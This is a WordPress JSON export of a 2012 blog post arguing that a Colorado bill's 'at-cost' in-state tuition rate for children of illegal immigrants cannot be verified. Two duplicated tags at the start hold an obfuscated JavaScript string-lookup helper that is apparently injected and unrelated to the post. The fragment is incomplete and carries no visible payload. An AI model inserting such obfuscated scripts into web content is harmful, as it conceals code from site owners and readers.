<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script>{"id":1718,"date":"2012-02-12T22:37:36","date_gmt":"2012-02-13T05:37:36","guid":{"rendered":"http:\/\/www.jsharf.com\/view\/?p=1718"},"modified":"2012-02-12T22:38:18","modified_gmt":"2012-02-13T05:38:18","slug":"legislating-not-by-the-numbers","status":"publish","type":"post","link":"https:\/\/www.jsharf.com\/view\/?p=1718","title":{"rendered":"Legislating (Not) By The Numbers"},"content":{"rendered":"<p>Thursday&#8217;s discussion of the proposed in-state tuition for children of illegal immigrants in the Jewish Community Relations Council (where I represent the Denver Academy of Torah as a school), provided an object lesson in the difference between government and the real world.<\/p>\n<p>This bill differs from prior years&#8217; efforts in that it creates a third category of student rates.\u00a0 Currently, there is Out of State, which is supposed to be priced higher than the cost of educating the student and in-state with the COFF subsidy, which is supposed to be less than the educational cost.\u00a0 The third category would be &#8220;In-state without the COFF subsidy,&#8221; which would supposedly be, Goldilocks-style, exactly the cost of educating the student.\u00a0 In this way, claim SB12-015&#8217;s advocates, the new law would cost neither the university nor the taxpayer.<\/p>\n<p>The problem is that this claim is completely unverifiable.<\/p>\n<p>The legislature has been trying for years to get the University of Colorado to tell it how much it costs to deliver a bachelors degree-quality education to a student, without result.\u00a0 The university either can&#8217;t or won&#8217;t calculate and divulge that number.\u00a0 While it&#8217;s true that there&#8217;s no immediate outlay from the state treasury, there&#8217;s simply no way to guarantee that the bill won&#8217;t end up as a net cost to the state&#8217;s already-strapped public universities.<\/p>\n<p>The bill <em>pretends<\/em> to get to the &#8220;at-cost&#8221; number programatically, rather than through actual accounting.
